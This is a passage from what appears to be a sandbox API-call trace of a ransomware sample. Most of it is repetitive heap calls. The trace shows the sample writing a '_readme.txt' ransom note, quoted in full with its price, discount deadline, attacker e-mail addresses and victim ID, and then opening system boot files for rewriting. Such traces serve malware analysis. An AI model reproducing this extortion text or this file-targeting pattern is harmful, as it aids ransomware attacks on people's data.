(HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0178.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.593] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.593] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.593] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.593] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.608] PathFindFileNameW (pszPath="C:\\Boot\\da-DK\\") returned="da-DK\\" [0178.608] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0178.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.608] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0178.609] PathFindFileNameW (pszPath="") returned="" [0178.609] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0178.609] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0178.609] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0178.609] FreeLibrary (hLibModule=0x759d0000) returned 1 [0178.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.610] PathAppendW (in: pszPath="C:\\Boot\\da-DK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0178.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.610] PathFileExistsW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 0 [0178.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d32670 [0178.610] lstrcpyW (in: lpString1=0x2d32670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0178.610] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0178.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0178.610] CreateFileW (lpFileName="C:\\Boot\\da-DK\\_readme.txt" (normalized: "c:\\boot\\da-dk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0178.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0178.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.611] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*" (normalized: "c:\\boot\\da-dk\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0178.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.612] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.612] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0178.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0178.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.613] PathFindExtensionW (pszPath="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned=".mui" [0178.613] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0178.613] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0178.613] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0178.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.614] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0178.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.614] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0178.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.617] RtlAllocateHeap 